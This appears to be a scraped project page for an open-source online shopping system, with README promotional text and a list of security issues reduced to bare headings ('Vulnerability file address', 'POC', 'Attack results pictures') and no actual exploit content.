Updated project with extra Features like WISHLIST, List Orders, add Reviews, updated routing, resolved search bug is available for Premium

Things I code with

Projects We develop

Projects with installation support and code explaination for Premium contact gmail: [email protected] or visit :Projects Wall

Installation

If you like my project

visit my other repository with different admin pages with below link

If you like my project hit a star button

Screenshots

Contributing

online-shopping-system-advanced's People

Contributors

Stargazers

Watchers

Forkers

online-shopping-system-advanced's Issues

Vulnerability file address

POC

Attack results pictures

Vulnerability file address

POC

Attack results pictures

Vulnerability file address

POC

Attack results pictures

Vulnerability file address

POC

Attack results pictures

Vulnerability file address

POC

Attack results pictures

success

failed

Vulnerability file address

POC

Attack results pictures

Vulnerability file address

POC

Attack results pictures

Vulnerability file address

POC

Attack results pictures

Vulnerability file address

POC

Attack results pictures

All:

original and wrong query in file action.php

this is the correcto query

Vulnerability file address

POC

Attack results pictures

Vulnerability file address

POC

Attack results pictures

Vulnerability file address

POC

Attack results pictures

Recommend Projects

Recommend Topics

Recommend Org